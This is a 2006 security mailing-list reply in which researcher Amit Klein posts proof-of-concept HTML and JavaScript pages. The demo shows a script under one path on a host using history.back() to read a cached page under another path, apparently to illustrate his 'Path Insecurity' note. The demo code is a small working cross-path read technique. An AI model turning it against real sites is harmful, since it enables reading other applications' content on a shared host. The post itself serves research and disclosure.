Re: [WEB SECURITY] Technical Note by Amit Klein: "Path Insecurity"

["Amit Klein (AKsecurity)" <aksecurity@xxxxxxxxxx>]

On 2 May 2006 at 13:42, Brian Eaton wrote:

> 
> I know the browser has the previous version of /bar/page1.html around
> even with "no-cache" headers, because I can view it with the forward
> and back buttons in my browser.  But I can't figure out how to get to
> it with javascript.  You mentioned traversing the history list in your
> original note - do you still have that code around?
> 

Sure, here is a demo (BTW - I noticed a typo in my original manuscript - the 
history object method is called "back()", not "prev()". Sorry for that):

/bar/page1.html:

<html>
<body>
This is page one.
<a href="/bar/page2.html">Go to the next page</a>
</body>
</html>


/bar/page2.html:

<html>
<body>
This is page two.
</body>
</html>


/foo/attack.html:

<html>
<body>
<script>
function getprev()
{
	H.history.back();
	setTimeout("alert(H.document.body.innerHTML)",3000);
}
H=window.open("/bar/page1.html");
setTimeout("getprev()",15000);
</script>
</body>
</html>


Now, fire up /foo/attack.html. It will open another window for /bar/page1.html. Quickly 
(within 15 seconds) click on the link in the /bar/page1.html to move to /bar/page2.html (in 
the same window). Then wait, and within 18 seconds you'll see that the page navigates back 
to /bar/page1.html and foo reads that page and displays its HTML content.

Hope that helps,
-Amit

---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/